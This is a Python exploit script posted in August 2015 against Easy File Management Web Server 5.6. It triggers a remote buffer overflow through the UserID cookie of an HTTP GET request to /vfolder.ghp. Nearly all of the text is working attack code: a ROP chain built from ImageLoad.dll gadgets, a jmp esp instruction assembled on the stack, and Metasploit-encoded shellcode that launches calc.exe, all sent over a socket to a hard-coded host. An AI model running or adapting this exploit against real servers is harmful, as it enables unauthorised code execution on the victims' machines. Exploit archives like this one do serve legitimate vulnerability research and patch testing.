Easy File Management Web Server 5.6 Buffer Overflow
Posted on 20 August 2015
#!/usr/bin/python # Exploit Title: Easy File Management Web Server v5.6 - USERID Remote Buffer Overflow # Version: 5.6 # Date: 2015-08-17 # Author: Tracy Turben (tracyturben@gmail.com) # Software Link: http://www.efssoft.com/ # Tested on: Win7x32-EN # Special Thanks To: Julien Ahrens for the crafted jmp esp Trick ;) # Credits for vulnerability discovery: # superkojiman (http://www.exploit-db.com/exploits/33453/) from struct import pack import socket,sys import os host="192.168.1.15" port=80 junk0 = "x90" * 80 # 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll] # The memory located at 0x1001D8F0: "x7AxD8x01x10" does the job! # Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8 call_edx=pack('<L',0x1001D8C8) junk1="x90" * 280 ppr=pack('<L',0x10010101) # POP EBX # POP ECX # RETN [ImageLoad.dll] # Since 0x00 would break the exploit needs to be crafted on the stack crafted_jmp_esp=pack('<L',0xA44162FB) test_bl=pack('<L',0x10010125) # contains 00000000 to pass the JNZ instruction kungfu=pack('<L',0x10022aac) # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll] kungfu+=pack('<L',0xDEADBEEF) # filler kungfu+=pack('<L',0xDEADBEEF) # filler kungfu+=pack('<L',0x1001a187) # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] # finish crafting JMP ESP kungfu+=pack('<L',0x1002466d) # PUSH EAX # RETN [ImageLoad.dll] nopsled="x90" * 20 # windows/exec CMD=calc.exe # Encoder: x86/shikata_ga_nai # powered by Metasploit # msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00x0ax0d' shellcode=("xdaxcaxbbxfdx11xa3xaexd9x74x24xf4x5ax31xc9" + "xb1x33x31x5ax17x83xc2x04x03xa7x02x41x5bxab" + "xcdx0cxa4x53x0ex6fx2cxb6x3fxbdx4axb3x12x71" + "x18x91x9exfax4cx01x14x8ex58x26x9dx25xbfx09" + "x1ex88x7fxc5xdcx8ax03x17x31x6dx3dxd8x44x6c" + "x7ax04xa6x3cxd3x43x15xd1x50x11xa6xd0xb6x1e" + "x96xaaxb3xe0x63x01xbdx30xdbx1exf5xa8x57x78" + "x26xc9xb4x9ax1ax80xb1x69xe8x13x10xa0x11x22" + "x5cx6fx2cx8bx51x71x68x2bx8ax04x82x48x37x1f" + "x51x33xe3xaax44x93x60x0cxadx22xa4xcbx26x28" + "x01x9fx61x2cx94x4cx1ax48x1dx73xcdxd9x65x50" + "xc9x82x3exf9x48x6ex90x06x8axd6x4dxa3xc0xf4" + "x9axd5x8ax92x5dx57xb1xdbx5ex67xbax4bx37x56" + "x31x04x40x67x90x61xbex2dxb9xc3x57xe8x2bx56" + "x3ax0bx86x94x43x88x23x64xb0x90x41x61xfcx16" + "xb9x1bx6dxf3xbdx88x8exd6xddx4fx1dxbax0fxea" + "xa5x59x50") payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode buf="GET /vfolder.ghp HTTP/1.1 " buf+="User-Agent: Mozilla/4.0 " buf+="Host:" + host + ":" + str(port) + " " buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 " buf+="Accept-Language: en-us " buf+="Accept-Encoding: gzip, deflate " buf+="Referer: http://" + host + "/ " buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=; " buf+="Conection: Keep-Alive " print "[*] Connecting to Host " + host + "..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((host, port)) print "[*] Connected to " + host + "!" except: print "[!] " + host + " didn't respond " sys.exit(0) print "[*] Sending malformed request..." s.send(buf) print "[!] Exploit has been sent! " s.close()
